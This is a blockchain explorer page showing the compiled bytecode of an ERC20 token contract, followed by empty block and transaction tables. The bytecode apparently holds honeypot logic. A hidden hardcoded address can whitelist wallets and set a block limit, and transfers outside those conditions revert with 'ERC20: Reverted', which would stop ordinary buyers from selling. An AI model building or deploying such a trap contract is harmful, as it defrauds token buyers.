201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016104e3565b600c546040516001600160a01b038084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a3600c80546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b03831661080a5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016104e3565b6001600160a01b03821661086b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016104e3565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006108d88484610662565b9050600019811461094057818110156109335760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016104e3565b61094084848484036107a8565b50505050565b6001600160a01b0383166109aa5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016104e3565b6001600160a01b038216610a0c5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016104e3565b610a17838383610408565b6001600160a01b03831660009081526001602052604090205481811015610a8f5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016104e3565b3260009081526007602052604090205460ff16151560011480610ad557506009546001600160a01b0385166000908152600a6020526040902054610ad39043610ee5565b105b80610ae857506001600160a01b03831632145b610b265760405162461bcd60e51b815260206004820152600f60248201526e115490cc8c0e8814995d995c9d1959608a1b60448201526064016104e3565b610b308282610ee5565b6001600160a01b038086166000908152600160205260408082209390935590851681522054610b60908390610ed2565b6001600160a01b0380851660008181526001602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610bb49086815260200190565b60405180910390a36109408484846001600160a01b0382166000908152600a60205260408120549003610bfd576001600160a01b0382166000908152600a602052604090204390555b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316826001600160a01b031603610408576002600955505050565b600060208083528351808285015260005b81811015610c6d57858101830151858201604001528201610c51565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610ca557600080fd5b919050565b60008060408385031215610cbd57600080fd5b610cc683610c8e565b946020939093013593505050565b634e487b7160e01b600052604160045260246000fd5b60008060408385031215610cfd57600080fd5b610d0683610c8e565b915060208084013567ffffffffffffffff80821115610d2457600080fd5b818601915086601f830112610d3857600080fd5b813581811115610d4a57610d4a610cd4565b8060051b604051601f19603f83011681018181108582111715610d6f57610d6f610cd4565b604052918252848201925083810185019189831115610d8d57600080fd5b938501935b82851015610db257610da385610c8e565b84529385019392850192610d92565b8096505050505050509250929050565b600080600060608486031215610dd757600080fd5b610de084610c8e565b9250610dee60208501610c8e565b9150604084013590509250925092565b600060208284031215610e1057600080fd5b5035919050565b600060208284031215610e2957600080fd5b610e3282610c8e565b9392505050565b60008060408385031215610e4c57600080fd5b610e5583610c8e565b9150610e6360208401610c8e565b90509250929050565b600181811c90821680610e8057607f821691505b602082108103610ea057634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052601160045260246000fd5b8082018082111561035957610359610ebc565b8181038181111561035957610359610ebc56fea26469706673582212203b27cee4a5323ddbffbe9e97e7d843d6050b7583239141830876399d69c4b39c64736f6c63430008110033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101215760003560e01c80636aeac363116100ad57806395d89b411161007157806395d89b411461025f578063a457c2d714610267578063a9059cbb1461027a578063dd62ed3e1461028d578063f2fde38b146102a057600080fd5b80636aeac3631461020157806370a082311461020a578063715018a6146102335780638da5cb5b1461023b57806395c5c5e31461024c57600080fd5b806323b872dd116100f457806323b872dd1461018e578063313ce567146101a157806339509351146101b05780633ba93f26146101c357806349bd5a5e146101d657600080fd5b806306fdde0314610126578063095ea7b31461014457806318160ddd146101675780631cd52b3814610179575b600080fd5b61012e6102b3565b60405161013b9190610c40565b60405180910390f35b610157610152366004610caa565b610345565b604051901515815260200161013b565b6004545b60405190815260200161013b565b61018c610187366004610cea565b61035f565b005b61015761019c366004610dc2565b61040e565b6040516012815260200161013b565b6101576101be366004610caa565b610432565b61018c6101d1366004610dfe565b610454565b600b546101e9906001600160a01b031681565b6040516001600160a01b03909116815260200161013b565b61016b60095481565b61016b610218366004610e17565b6001600160a01b031660009081526001602052604090205490565b61018c61048d565b600c546001600160a01b03166101e9565b61018c61025a366004610e39565b610536565b61012e6105ca565b610157610275366004610caa565b6105d9565b610157610288366004610caa565b610654565b61016b61029b366004610e39565b610662565b61018c6102ae366004610e17565b61068d565b6060600580546102c290610e6c565b80601f01602080910402602001604051908101604052809291908181526020018280546102ee90610e6c565b801561033b5780601f106103105761010080835404028352916020019161033b565b820191906000526020600020905b81548152906001019060200180831161031e57829003601f168201915b5050505050905090565b6000336103538185856107a8565b60019150505b92915050565b6001600160a01b037f000000000000000000000000d44f25e4ba35ac2eed784100ecc15fc88e52475016330361040a57600b80546001600160a01b0319166001600160a01b03841617905560005b8151811015610408576001600760008484815181106103ce576103ce610ea6565b6020908102919091018101516001600160a01b03168252810191909152604001600020805460ff19169115159190911790556001016103ad565b505b5050565b60003361041c8582856108cc565b610427858585610946565b506001949350505050565b6000336103538185856104458383610662565b61044f9190610ed2565b6107a8565b6001600160a01b037f000000000000000000000000d44f25e4ba35ac2eed784100ecc15fc88e52475016330361048a5760098190555b50565b600c546001600160a01b031633146104ec5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b600c546040516000916001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600c80546001600160a01b0319169055565b600b546001600160a01b031661056257600b80546001600160a01b0319166001600160a01b0384161790555b6001600160a01b037f000000000000000000000000d44f25e4ba35ac2eed784100ecc15fc88e52475016330361040a57600b80546001600160a01b0319166001600160a01b03938416179055166000908152600760205260409020805460ff19166001179055565b6060600680546102c290610e6c565b600033816105e78286610662565b9050838110156106475760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016104e3565b61042782868684036107a8565b600033610353818585610946565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b600c546001600160a01b031633146106e75760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016104e3565b6001600160a01b03811661074c5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016104e3565b600c546040516001600160a01b038084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a3600c80546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b03831661080a5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016104e3565b6001600160a01b03821661086b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016104e3565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006108d88484610662565b9050600019811461094057818110156109335760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016104e3565b61094084848484036107a8565b50505050565b6001600160a01b0383166109aa5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016104e3565b6001600160a01b038216610a0c5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016104e3565b610a17838383610408565b6001600160a01b03831660009081526001602052604090205481811015610a8f5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016104e3565b3260009081526007602052604090205460ff16151560011480610ad557506009546001600160a01b0385166000908152600a6020526040902054610ad39043610ee5565b105b80610ae857506001600160a01b03831632145b610b265760405162461bcd60e51b815260206004820152600f60248201526e115490cc8c0e8814995d995c9d1959608a1b60448201526064016104e3565b610b308282610ee5565b6001600160a01b038086166000908152600160205260408082209390935590851681522054610b60908390610ed2565b6001600160a01b0380851660008181526001602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610bb49086815260200190565b60405180910390a36109408484846001600160a01b0382166000908152600a60205260408120549003610bfd576001600160a01b0382166000908152600a602052604090204390555b7f000000000000000000000000e0b9dc6300cf4abec352b1322316b6221be1ad156001600160a01b0316826001600160a01b031603610408576002600955505050565b600060208083528351808285015260005b81811015610c6d57858101830151858201604001528201610c51565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610ca557600080fd5b919050565b60008060408385031215610cbd57600080fd5b610cc683610c8e565b946020939093013593505050565b634e487b7160e01b600052604160045260246000fd5b60008060408385031215610cfd57600080fd5b610d0683610c8e565b915060208084013567ffffffffffffffff80821115610d2457600080fd5b818601915086601f830112610d3857600080fd5b813581811115610d4a57610d4a610cd4565b8060051b604051601f19603f83011681018181108582111715610d6f57610d6f610cd4565b604052918252848201925083810185019189831115610d8d57600080fd5b938501935b82851015610db257610da385610c8e565b84529385019392850192610d92565b8096505050505050509250929050565b600080600060608486031215610dd757600080fd5b610de084610c8e565b9250610dee60208501610c8e565b9150604084013590509250925092565b600060208284031215610e1057600080fd5b5035919050565b600060208284031215610e2957600080fd5b610e3282610c8e565b9392505050565b60008060408385031215610e4c57600080fd5b610e5583610c8e565b9150610e6360208401610c8e565b90509250929050565b600181811c90821680610e8057607f821691505b602082108103610ea057634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052601160045260246000fd5b8082018082111561035957610359610ebc565b8181038181111561035957610359610ebc56fea26469706673582212203b27cee4a5323ddbffbe9e97e7d843d6050b7583239141830876399d69c4b39c64736f6c63430008110033

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.